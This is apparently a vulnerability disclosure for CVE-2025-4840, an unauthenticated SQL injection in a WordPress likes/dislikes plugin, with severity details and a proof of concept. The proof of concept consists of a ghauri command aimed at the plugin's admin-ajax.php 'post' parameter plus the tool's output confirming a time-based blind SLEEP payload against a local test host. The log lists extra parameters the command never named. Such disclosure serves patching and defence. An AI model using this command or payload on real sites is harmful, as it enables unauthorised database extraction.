# CVE-2025-4840
Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection

# Description

The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the 'post' parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

## Details

- **Type**: plugin
- **Slug**: inprosysmedia-likes-dislikes-post
- **Affected Version**: 1.0.0
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2025-4840
- **Status**: Closed

POC
---

```
ghauri -u "http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php"   --data="action=my_likes_dislikes_action&post=*"    --dbms mysql   --level 5  --time-sec 5


  ________.__                        .__  {1.4.1}
 /  _____/|  |__ _____   __ _________|__|
/   \  ___|  |  \\__  \ |  |  \_  __ \  |
\    \_\  \   Y  \/ __ \|  |  /|  | \/  |
 \______  /___|  (____  /____/ |__|  |__|
        \/     \/     \/         https://github.com/r0oth3x49
                                 An advanced SQL injection detection & exploitation tool.



[*] starting @ 11:09:04 /2025-07-10/

custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y

[11:09:06] [INFO] testing connection to the target URL
[11:09:06] [INFO] testing for SQL injection on (custom) POST parameter 'post'
[11:09:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:09:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[11:09:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[11:09:10] [INFO] testing 'Boolean-based blind - Parameter replace'
[11:09:11] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:09:11] [INFO] testing 'boolean-based blind - WHERE or HAVING clause (CASE STATEMENT)'
[11:09:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:09:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:09:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[11:09:14] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:09:14] [INFO] testing 'MySQL boolean-based blind - (IF STATEMENT)'
[11:09:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind (query SLEEP)'
[11:09:39] [INFO] POST parameter 'post' appears to be 'MySQL >= 5.0.12 time-based blind (query SLEEP)' injectable
[11:09:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:09:39] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:09:40] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:09:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:09:41] [INFO] testing 'MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:09:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:09:43] [INFO] checking if the injection point on POST parameter 'post' is a false positive
POST parameter 'post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

Ghauri identified the following injection point(s) with a total of 196 HTTP(s) requests:
---
Parameter: dbid (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: action=my_likes_dislikes_action&post=*

Parameter: uri (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
    Payload: action=my_likes_dislikes_action&post=*

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=my_likes_dislikes_action&post=*

Parameter: post (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: action=my_likes_dislikes_action&post=(SELECT(0)FROM(SELECT(SLEEP(8)))a)
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: dbid  (default)
[1] place: POST, parameter: uri
[2] place: POST, parameter: post
[q] Quit
> 0

[11:10:56] [INFO] testing MySQL
[11:10:56] [INFO] confirming MySQL
[11:10:56] [INFO] the back-end DBMS is MySQL
```
